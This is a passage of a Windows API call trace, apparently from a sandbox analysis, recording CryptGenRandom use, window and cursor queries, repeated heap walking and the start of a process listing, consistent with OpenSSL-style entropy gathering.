Buffer=0x39cf02c) returned 0x0 [0202.209] GetCurrentThreadId () returned 0x600 [0202.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0202.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0202.209] NetApiBufferFree (Buffer=0x32e51f8) returned 0x0 [0202.209] FreeLibrary (hLibModule=0x74290000) returned 1 [0202.211] GetProcAddress (hModule=0x76930000, lpProcName="CryptAcquireContextW") returned 0x7693df14 [0202.211] GetProcAddress (hModule=0x76930000, lpProcName="CryptGenRandom") returned 0x7693dfc8 [0202.212] GetProcAddress (hModule=0x76930000, lpProcName="CryptReleaseContext") returned 0x7693e124 [0202.212] CryptAcquireContextW (in: phProv=0x39cf018, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cf018*=0x321b78) returned 1 [0202.212] CryptGenRandom (in: hProv=0x321b78, dwLen=0x40, pbBuffer=0x39cf464 | out: pbBuffer=0x39cf464) returned 1 [0202.213] GetCurrentThreadId () returned 0x600 [0202.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0202.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0202.213] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0202.213] CryptAcquireContextW (in: phProv=0x39cf018, szContainer=0x0, szProvider="Intel Hardware Cryptographic Service Provider", dwProvType=0x16, dwFlags=0x0 | out: phProv=0x39cf018*=0x321b78) returned 0 [0202.213] FreeLibrary (hLibModule=0x76930000) returned 1 [0202.213] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0202.213] GetProcAddress (hModule=0x400000, lpProcName="_OPENSSL_isservice") returned 0x0 [0202.213] GetDesktopWindow () returned 0x10010 [0202.213] GetProcessWindowStation () returned 0x5c [0202.213] GetUserObjectInformationW (in: hObj=0x5c, nIndex=2, pvInfo=0x0, nLength=0x0, lpnLengthNeeded=0x39cefa0 | out: pvInfo=0x0, lpnLengthNeeded=0x39cefa0) returned 0 [0202.213] GetLastError () returned 0x7a [0202.219] GetUserObjectInformationW (in: hObj=0x5c, nIndex=2, pvInfo=0x39cef80, nLength=0x10, lpnLengthNeeded=0x39cefa0 | out: pvInfo=0x39cef80, lpnLengthNeeded=0x39cefa0) returned 1 [0202.219] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x74db0000 [0202.220] GetProcAddress (hModule=0x74db0000, lpProcName="GetForegroundWindow") returned 0x74dd2320 [0202.220] GetProcAddress (hModule=0x74db0000, lpProcName="GetCursorInfo") returned 0x74e2812f [0202.220] GetProcAddress (hModule=0x74db0000, lpProcName="GetQueueStatus") returned 0x74dd3924 [0202.220] GetForegroundWindow () returned 0x10058 [0202.248] GetCurrentThreadId () returned 0x600 [0202.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0202.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0202.248] GetCursorInfo (in: pci=0x39cf450 | out: pci=0x39cf450) returned 1 [0202.249] GetQueueStatus (flags=0xbf) returned 0x0 [0202.249] GetCurrentThreadId () returned 0x600 [0202.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0202.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0202.249] FreeLibrary (hLibModule=0x74db0000) returned 1 [0202.249] GetProcAddress (hModule=0x74eb0000, lpProcName="CreateToolhelp32Snapshot") returned 0x74ee735f [0202.249] GetProcAddress (hModule=0x74eb0000, lpProcName="CloseToolhelp32Snapshot") returned 0x0 [0202.249] GetProcAddress (hModule=0x74eb0000, lpProcName="Heap32First") returned 0x74f45763 [0202.250] GetProcAddress (hModule=0x74eb0000, lpProcName="Heap32Next") returned 0x74f4594e [0202.250] GetProcAddress (hModule=0x74eb0000, lpProcName="Heap32ListFirst") returned 0x74f45621 [0202.250] GetProcAddress (hModule=0x74eb0000, lpProcName="Heap32ListNext") returned 0x74f456cb [0202.250] GetProcAddress (hModule=0x74eb0000, lpProcName="Process32First") returned 0x74ee8ae7 [0202.250] GetProcAddress (hModule=0x74eb0000, lpProcName="Process32Next") returned 0x74ee88a4 [0202.250] GetProcAddress (hModule=0x74eb0000, lpProcName="Thread32First") returned 0x74f45b93 [0202.251] GetProcAddress (hModule=0x74eb0000, lpProcName="Thread32Next") returned 0x74f45c3f [0202.251] GetProcAddress (hModule=0x74eb0000, lpProcName="Module32First") returned 0x74f45cd9 [0202.251] GetProcAddress (hModule=0x74eb0000, lpProcName="Module32Next") returned 0x74f45dc2 [0202.251] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x64c [0202.260] GetTickCount () returned 0x113d5c6 [0202.260] Heap32ListFirst (hSnapshot=0x64c, lphl=0x39cf454) returned 1 [0202.260] GetCurrentThreadId () returned 0x600 [0202.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0202.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0202.260] Heap32First (lphe=0x39cefc0, th32ProcessID=0x4d0, th32HeapID=0x2c0000) returned 1 [0202.285] GetCurrentThreadId () returned 0x600 [0202.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0202.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0202.285] Heap32Next (lphe=0x39cefc0) returned 1 [0202.303] GetTickCount () returned 0x113d5e6 [0202.303] GetCurrentThreadId () returned 0x600 [0202.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0202.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0202.303] Heap32Next (lphe=0x39cefc0) returned 1 [0202.321] GetTickCount () returned 0x113d605 [0202.321] GetCurrentThreadId () returned 0x600 [0202.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0202.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0202.321] Heap32Next (lphe=0x39cefc0) returned 1 [0202.338] GetTickCount () returned 0x113d614 [0202.338] GetCurrentThreadId () returned 0x600 [0202.339] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0202.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0202.339] Heap32Next (lphe=0x39cefc0) returned 1 [0202.356] GetTickCount () returned 0x113d624 [0202.356] GetCurrentThreadId () returned 0x600 [0202.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0202.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0202.356] Heap32Next (lphe=0x39cefc0) returned 1 [0202.374] GetTickCount () returned 0x113d634 [0202.374] GetCurrentThreadId () returned 0x600 [0202.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0202.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0202.374] Heap32Next (lphe=0x39cefc0) returned 1 [0202.392] GetTickCount () returned 0x113d643 [0202.392] GetCurrentThreadId () returned 0x600 [0202.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0202.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0202.392] Heap32Next (lphe=0x39cefc0) returned 1 [0202.410] GetTickCount () returned 0x113d653 [0202.410] GetCurrentThreadId () returned 0x600 [0202.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0202.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0202.410] Heap32Next (lphe=0x39cefc0) returned 1 [0202.428] GetTickCount () returned 0x113d662 [0202.428] GetCurrentThreadId () returned 0x600 [0202.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0202.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0202.428] Heap32Next (lphe=0x39cefc0) returned 1 [0202.445] GetTickCount () returned 0x113d682 [0202.446] GetCurrentThreadId () returned 0x600 [0202.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0202.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0202.446] Heap32Next (lphe=0x39cefc0) returned 1 [0202.463] GetTickCount () returned 0x113d691 [0202.463] GetCurrentThreadId () returned 0x600 [0202.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0202.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0202.463] Heap32Next (lphe=0x39cefc0) returned 1 [0202.491] GetTickCount () returned 0x113d6b0 [0202.491] GetCurrentThreadId () returned 0x600 [0202.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0202.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0202.491] Heap32Next (lphe=0x39cefc0) returned 1 [0202.509] GetTickCount () returned 0x113d6c0 [0202.509] GetCurrentThreadId () returned 0x600 [0202.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0202.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0202.509] Heap32Next (lphe=0x39cefc0) returned 1 [0202.528] GetTickCount () returned 0x113d6d0 [0202.528] GetCurrentThreadId () returned 0x600 [0202.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0202.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0202.528] Heap32Next (lphe=0x39cefc0) returned 1 [0202.546] GetTickCount () returned 0x113d6df [0202.546] GetCurrentThreadId () returned 0x600 [0202.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0202.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0202.546] Heap32Next (lphe=0x39cefc0) returned 1 [0202.563] GetTickCount () returned 0x113d6ef [0202.563] GetCurrentThreadId () returned 0x600 [0202.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0202.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0202.563] Heap32Next (lphe=0x39cefc0) returned 1 [0202.581] GetTickCount () returned 0x113d6fe [0202.581] GetCurrentThreadId () returned 0x600 [0202.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0202.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0202.581] Heap32Next (lphe=0x39cefc0) returned 1 [0202.598] GetTickCount () returned 0x113d70e [0202.598] GetCurrentThreadId () returned 0x600 [0202.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0202.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0202.599] Heap32Next (lphe=0x39cefc0) returned 1 [0202.616] GetTickCount () returned 0x113d72d [0202.616] GetCurrentThreadId () returned 0x600 [0202.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0202.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0202.616] Heap32Next (lphe=0x39cefc0) returned 1 [0202.634] GetTickCount () returned 0x113d73d [0202.634] GetCurrentThreadId () returned 0x600 [0202.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0202.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0202.634] Heap32Next (lphe=0x39cefc0) returned 1 [0202.651] GetTickCount () returned 0x113d74c [0202.651] GetCurrentThreadId () returned 0x600 [0202.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0202.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0202.651] Heap32Next (lphe=0x39cefc0) returned 1 [0202.669] GetTickCount () returned 0x113d75c [0202.669] GetCurrentThreadId () returned 0x600 [0202.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0202.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0202.669] Heap32Next (lphe=0x39cefc0) returned 1 [0202.687] GetTickCount () returned 0x113d76c [0202.687] GetCurrentThreadId () returned 0x600 [0202.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0202.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0202.687] Heap32Next (lphe=0x39cefc0) returned 1 [0202.705] GetTickCount () returned 0x113d77b [0202.705] GetCurrentThreadId () returned 0x600 [0202.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0202.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0202.705] Heap32Next (lphe=0x39cefc0) returned 1 [0202.722] GetTickCount () returned 0x113d78b [0202.722] GetCurrentThreadId () returned 0x600 [0202.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0202.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0202.722] Heap32Next (lphe=0x39cefc0) returned 1 [0202.740] GetTickCount () returned 0x113d79a [0202.740] GetCurrentThreadId () returned 0x600 [0202.740] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0202.740] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0202.740] Heap32Next (lphe=0x39cefc0) returned 1 [0202.758] GetTickCount () returned 0x113d7ba [0202.758] GetCurrentThreadId () returned 0x600 [0202.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0202.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0202.758] Heap32Next (lphe=0x39cefc0) returned 1 [0202.776] GetTickCount () returned 0x113d7c9 [0202.776] GetCurrentThreadId () returned 0x600 [0202.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0202.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0202.776] Heap32Next (lphe=0x39cefc0) returned 1 [0202.793] GetTickCount () returned 0x113d7d9 [0202.793] GetCurrentThreadId () returned 0x600 [0202.793] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0202.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0202.793] Heap32Next (lphe=0x39cefc0) returned 1 [0202.811] GetTickCount () returned 0x113d7e8 [0202.811] GetCurrentThreadId () returned 0x600 [0202.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0202.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0202.811] Heap32Next (lphe=0x39cefc0) returned 1 [0202.828] GetTickCount () returned 0x113d7f8 [0202.828] GetCurrentThreadId () returned 0x600 [0202.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0202.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0202.829] Heap32Next (lphe=0x39cefc0) returned 1 [0202.846] GetTickCount () returned 0x113d808 [0202.846] GetCurrentThreadId () returned 0x600 [0202.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0202.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0202.847] Heap32Next (lphe=0x39cefc0) returned 1 [0202.864] GetTickCount () returned 0x113d817 [0202.864] GetCurrentThreadId () returned 0x600 [0202.864] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0202.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0202.864] Heap32Next (lphe=0x39cefc0) returned 1 [0202.882] GetTickCount () returned 0x113d836 [0202.882] GetCurrentThreadId () returned 0x600 [0202.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0202.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0202.882] Heap32Next (lphe=0x39cefc0) returned 1 [0202.899] GetTickCount () returned 0x113d846 [0202.899] GetCurrentThreadId () returned 0x600 [0202.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0202.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0202.899] Heap32Next (lphe=0x39cefc0) returned 1 [0202.917] GetTickCount () returned 0x113d856 [0202.917] GetCurrentThreadId () returned 0x600 [0202.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0202.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0202.917] Heap32Next (lphe=0x39cefc0) returned 1 [0202.941] GetTickCount () returned 0x113d865 [0202.941] GetCurrentThreadId () returned 0x600 [0202.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0202.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0202.941] Heap32Next (lphe=0x39cefc0) returned 1 [0202.959] GetTickCount () returned 0x113d884 [0202.959] GetCurrentThreadId () returned 0x600 [0202.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0202.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0202.959] Heap32Next (lphe=0x39cefc0) returned 1 [0202.976] GetTickCount () returned 0x113d894 [0202.976] GetCurrentThreadId () returned 0x600 [0202.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0202.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0202.977] Heap32Next (lphe=0x39cefc0) returned 1 [0202.994] GetTickCount () returned 0x113d8a4 [0202.994] GetCurrentThreadId () returned 0x600 [0202.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0202.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0202.994] Heap32Next (lphe=0x39cefc0) returned 1 [0203.012] GetTickCount () returned 0x113d8b3 [0203.012] GetCurrentThreadId () returned 0x600 [0203.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.012] Heap32Next (lphe=0x39cefc0) returned 1 [0203.030] GetTickCount () returned 0x113d8c3 [0203.030] GetCurrentThreadId () returned 0x600 [0203.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.030] Heap32Next (lphe=0x39cefc0) returned 1 [0203.047] GetTickCount () returned 0x113d8d2 [0203.047] GetCurrentThreadId () returned 0x600 [0203.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.047] Heap32Next (lphe=0x39cefc0) returned 1 [0203.065] GetTickCount () returned 0x113d8e2 [0203.065] GetCurrentThreadId () returned 0x600 [0203.065] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.065] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.065] Heap32Next (lphe=0x39cefc0) returned 1 [0203.082] GetTickCount () returned 0x113d8f2 [0203.082] GetCurrentThreadId () returned 0x600 [0203.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.082] Heap32Next (lphe=0x39cefc0) returned 1 [0203.100] GetTickCount () returned 0x113d911 [0203.100] GetCurrentThreadId () returned 0x600 [0203.100] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.100] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.100] Heap32Next (lphe=0x39cefc0) returned 1 [0203.117] GetTickCount () returned 0x113d920 [0203.117] GetCurrentThreadId () returned 0x600 [0203.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.117] Heap32Next (lphe=0x39cefc0) returned 1 [0203.136] GetTickCount () returned 0x113d930 [0203.136] GetCurrentThreadId () returned 0x600 [0203.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.136] Heap32Next (lphe=0x39cefc0) returned 1 [0203.154] GetTickCount () returned 0x113d940 [0203.154] GetCurrentThreadId () returned 0x600 [0203.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.154] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.154] Heap32Next (lphe=0x39cefc0) returned 1 [0203.173] GetTickCount () returned 0x113d94f [0203.173] GetCurrentThreadId () returned 0x600 [0203.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.173] Heap32Next (lphe=0x39cefc0) returned 1 [0203.191] GetTickCount () returned 0x113d95f [0203.191] GetCurrentThreadId () returned 0x600 [0203.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.191] Heap32Next (lphe=0x39cefc0) returned 1 [0203.209] GetTickCount () returned 0x113d97e [0203.209] GetCurrentThreadId () returned 0x600 [0203.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.209] Heap32Next (lphe=0x39cefc0) returned 1 [0203.228] GetTickCount () returned 0x113d98e [0203.228] GetCurrentThreadId () returned 0x600 [0203.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.228] Heap32Next (lphe=0x39cefc0) returned 1 [0203.246] GetTickCount () returned 0x113d99d [0203.246] GetCurrentThreadId () returned 0x600 [0203.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.246] Heap32Next (lphe=0x39cefc0) returned 1 [0203.264] GetTickCount () returned 0x113d9ad [0203.264] GetCurrentThreadId () returned 0x600 [0203.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.264] Heap32Next (lphe=0x39cefc0) returned 1 [0203.283] GetTickCount () returned 0x113d9bc [0203.283] Heap32ListNext (hSnapshot=0x64c, lphl=0x39cf454) returned 1 [0203.284] GetTickCount () returned 0x113d9bc [0203.284] GetTickCount () returned 0x113d9bc [0203.284] Process32First (in: hSnapshot=0x64c, lppe=0x39cf258 | out: lppe=0x39cf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0203.285] GetCurrentThreadId () returned 0x600 [0203.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.285] Process32Next (in: hSnapshot=0x64c, lppe=0x39cf258 | out: lppe=0x39cf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0203.286] GetTickCount () returned 0x113d9bc [0203.286] GetCurrentThreadId () returned 0x600 [0203.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.286] Process32Next (in: hSnapshot=0x64c, lppe=0x39cf258 | out: lppe=0x39cf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0203.287] GetTickCount () returned 0x113d9cc [0203.287] GetCurrentThreadId () returned 0x600 [0203.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.287] Process32Next (in: hSnapshot=0x64c, lppe=0x39cf258 | out: lppe=0x39cf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0203.288] 